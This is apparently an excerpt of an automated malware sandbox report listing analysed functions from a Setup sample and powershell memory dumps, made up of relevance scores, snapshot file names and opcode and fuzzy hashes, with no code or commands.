                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                                                • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                Function 07091798 Relevance: 14.6, Strings: 11, Instructions: 849COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                • API String ID: 0-308583777
                                                                                                                                                                                                                                                                • Opcode ID: 5888a0f0c5b60a9a46e45e33f67af45e36ce024f9a16eaef7e37a9f0656b8d17
                                                                                                                                                                                                                                                                • Instruction ID: cc933c73f4fb94a3c5c7cf78dcace794c7b175610b74b53dbf8b7dec60a6e94c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5888a0f0c5b60a9a46e45e33f67af45e36ce024f9a16eaef7e37a9f0656b8d17
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC5276B1B0431B9FCF159B6888107AABBF6AFC2310F1485BAD515CB292DB35CC51D7A2
                                                                                                                                                                                                                                                                Function 041950E8 Relevance: .6, Instructions: 612COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 7006943a93744cd65b00e9050baace1e0fb0b9f9e73a4441c99197f75b4c8fa5
                                                                                                                                                                                                                                                                • Instruction ID: 60a9fc30b30ef6e68e5e6559b3f1d4f35eb344412775e39e0554ea5ad9e93659
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7006943a93744cd65b00e9050baace1e0fb0b9f9e73a4441c99197f75b4c8fa5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09424B75A00209EFCB05CFA8D594AAEBBF2FF88310F248559E815AB365D735ED41CB90
                                                                                                                                                                                                                                                                Function 04195E30 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: ee6a6609cb7d71c745e6a351dff9bcefb5160a92914d8cd2790259358b445451
                                                                                                                                                                                                                                                                • Instruction ID: 0af1cd8c3346e3bb7f12eebecf59e95e563c87a4763d57246394de84b03f6efa
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee6a6609cb7d71c745e6a351dff9bcefb5160a92914d8cd2790259358b445451
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1242FC74A002199FCB15CF98C594AAEFBF2FF88310F158599E845AB365C735ED81CBA0
                                                                                                                                                                                                                                                                Function 04192F78 Relevance: .5, Instructions: 472COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 90f8ebb2ec48a54279313421ffc179fbaba0a1524a9fef50b312cbc8043f59a6
                                                                                                                                                                                                                                                                • Instruction ID: 89339c3275b6c278e147d1085f49779f8d3c98289cef31efc39ef20195619940
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90f8ebb2ec48a54279313421ffc179fbaba0a1524a9fef50b312cbc8043f59a6
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE123874A00209AFDB05CF98C5D4AAEBBF2FF48310F258599E855AB365C735ED81CB90
                                                                                                                                                                                                                                                                Function 04194900 Relevance: .4, Instructions: 356COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 5efcf6c63b95cf98c826792c422a92cbb2f78e7dbc4bebb1f1b685b6bfd67f28
                                                                                                                                                                                                                                                                • Instruction ID: 4dddd45cfe2116a7a5a775c76ad2c6fe586648f1fce68efe19821e898c69a055
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5efcf6c63b95cf98c826792c422a92cbb2f78e7dbc4bebb1f1b685b6bfd67f28
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE17D30E092589FCF05DFA8D490A9DBBF2EF49310F25819AE444AB362C735ED46CB94
                                                                                                                                                                                                                                                                Function 07091A54 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: c5de8d41019a4cab8bd7c47b88331ed5c698c846864a4bd415cac50b49691dd8
                                                                                                                                                                                                                                                                • Instruction ID: 24c8c85e0172166d099a334912cd4081e94b9c7750d8d3faa302ea1a4ee7d8a0
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5de8d41019a4cab8bd7c47b88331ed5c698c846864a4bd415cac50b49691dd8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D84124F1B1020B9FCF608F6886417BE7BE2AF81244F1882B9D4149F251E735CC61E7A1
                                                                                                                                                                                                                                                                Function 041933F0 Relevance: .1, Instructions: 109COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 874f44b6cec6444f3ce963470e73e5c19d262209b38e5fedb8943b6054b83280
                                                                                                                                                                                                                                                                • Instruction ID: 7f1fbf93a4c6c5b97d89ed5c2417162e7f43cfe84c2efb25cb9bd44b2e9d32ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 874f44b6cec6444f3ce963470e73e5c19d262209b38e5fedb8943b6054b83280
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E411774A005099FCB0ACF58C1D8AAAFBF1FF48710B158599D855AB364C732FD90CBA0
                                                                                                                                                                                                                                                                Function 04193400 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 603add62bbb6414a94207b95bb9f0c0592fd6fe4efc1faae34394f84a82ac577
                                                                                                                                                                                                                                                                • Instruction ID: ddb811c165345d7dca95657c83ceae4081f2761ebec756f43c990525156e98dc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 603add62bbb6414a94207b95bb9f0c0592fd6fe4efc1faae34394f84a82ac577
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5410674A005099FCB09CF98C5D8AAAFBF1FF48710B1185A9D915AB364C732FD90CBA0
                                                                                                                                                                                                                                                                Function 04192A61 Relevance: .1, Instructions: 99COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d59d260aacf9c1328b6c621739ab02f177eaff4ea9ddad764b44302b4e5b3a7c
                                                                                                                                                                                                                                                                • Instruction ID: ab08d56eeab874fcdc4bc63b4741afcd577964da3caa93e806bdb33cfa21b802
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d59d260aacf9c1328b6c621739ab02f177eaff4ea9ddad764b44302b4e5b3a7c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C23170B4A093859FCB02CF58C890A99BFF1FF4A300B1945DAD449DB362C335AD55CBA1
                                                                                                                                                                                                                                                                Function 04192AB0 Relevance: .1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: b7a6a9b8c220c223ccc7c7c6f6abd2c57e9676ed1358a2fe15bac6f4c045b26e
                                                                                                                                                                                                                                                                • Instruction ID: df3c7acc6f4e6c8bc982f48e262958dab09b028860abc6f108b982c1220ad29f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7a6a9b8c220c223ccc7c7c6f6abd2c57e9676ed1358a2fe15bac6f4c045b26e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D211974A046099FCB01CF99C990AAAFBF5FF49310B148595E809EB361C735FC51CBA0
                                                                                                                                                                                                                                                                Function 041950D8 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 16fe46942aa8efd667653be34e314c25a081ec75566f8d3efa93d62c0f0d0b12
                                                                                                                                                                                                                                                                • Instruction ID: 89e78dca4b0be7d039cea89cb1e821b72a52f0d3dbb402ad47440cea7bd9a201
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 16fe46942aa8efd667653be34e314c25a081ec75566f8d3efa93d62c0f0d0b12
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F9213DB5A00205AFCB04DF59C9909AAFBF6FF48310B1585A5D918EB751C735FC82CBA1
                                                                                                                                                                                                                                                                Function 041948F1 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554785896.0000000004190000.00000040.00000800.00020000.00000000.sdmp, Offset: 04190000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_4190000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 675cff9993d269b6a0d98e9f121863dd29e636df781ea8c83cc815ed66e010c8
                                                                                                                                                                                                                                                                • Instruction ID: 83ff145270fd765a6782985eccb24491f1531dcab1f0a24ded584a5fc3a63c44
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 675cff9993d269b6a0d98e9f121863dd29e636df781ea8c83cc815ed66e010c8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 11211874A042099FCB00DF9CD590AAEBBF5FF89310B1485A9E959AB312D735FC41CBA1
                                                                                                                                                                                                                                                                Function 028CD01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554319514.00000000028CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028CD000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_28cd000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: da456a285494a2863116e4c0d62ca005b037bad3be8d59a684d82701c4d262ee
                                                                                                                                                                                                                                                                • Instruction ID: bdba834f5f9aa508f0c4bc5ab86cc09027a63d041baf4996f052d9a02b69206d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da456a285494a2863116e4c0d62ca005b037bad3be8d59a684d82701c4d262ee
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1901A7794053449AD7209A2DCD84B67BFDCEF45334F28C47DED488A286C379D846C6B1
                                                                                                                                                                                                                                                                Function 028CD007 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2554319514.00000000028CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028CD000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_28cd000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6bfafe7838ec8866e197b84b8c723a206204e8a5724b77ec176c16a25402bb3f
                                                                                                                                                                                                                                                                • Instruction ID: d8374e8bbb81a348d6c996d92add56fb4fb3617ccf18e981a7931ce140da2b1b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6bfafe7838ec8866e197b84b8c723a206204e8a5724b77ec176c16a25402bb3f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F01407500E3C09ED7128B258C94752BFB4DF57224F1DC0DBD9888F1A7C2699849C772

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 070908A0 Relevance: 9.1, Strings: 7, Instructions: 322COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                • API String ID: 0-108373575
                                                                                                                                                                                                                                                                • Opcode ID: 1b8f68e8ed124e4e66a10033750134f22688891df68f3ff0449d1297dc5ce8ea
                                                                                                                                                                                                                                                                • Instruction ID: 1e4ac1fc979df013c32db57fac9494ad2b47e80751211e52180c2b20db842c63
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b8f68e8ed124e4e66a10033750134f22688891df68f3ff0449d1297dc5ce8ea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAA177B27043178FDB555A6D84107AABBF5DFC2220F18857BD855CB292DB36CC41C3A1
                                                                                                                                                                                                                                                                Function 070904EB Relevance: 7.6, Strings: 6, Instructions: 79COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$$]q$$]q
                                                                                                                                                                                                                                                                • API String ID: 0-2669322367
                                                                                                                                                                                                                                                                • Opcode ID: 284082a38aaf51fd11fc473597c49798bda1ab61ed894835bce52f5ed34733da
                                                                                                                                                                                                                                                                • Instruction ID: 50bf3b79b60382faa5c5c9c836e118409bb0aedb561062a747ec60476dd6e545
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 284082a38aaf51fd11fc473597c49798bda1ab61ed894835bce52f5ed34733da
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 03113A717083576FCF69122C382026B6BE79FD296077946B7C4D1D7396CE258C468392
                                                                                                                                                                                                                                                                Function 07093518 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000011.00000002.2558900710.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_17_2_7090000_powershell.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: $]q$$]q$$]q$$]q
                                                                                                                                                                                                                                                                • API String ID: 0-858218434
                                                                                                                                                                                                                                                                • Opcode ID: 6abd9ccc367ba99c0d40694c19a465203ce28739f15e47d83c40625959a9d84e
                                                                                                                                                                                                                                                                • Instruction ID: e9aac425230b3d0b9fab21c3c3aa22949c40dfabe29260968cceeb98086ee27b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6abd9ccc367ba99c0d40694c19a465203ce28739f15e47d83c40625959a9d84e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 882149B53143027BDF68156E9840B27FED69BC8711F20893AA945CB381DD36C8419B61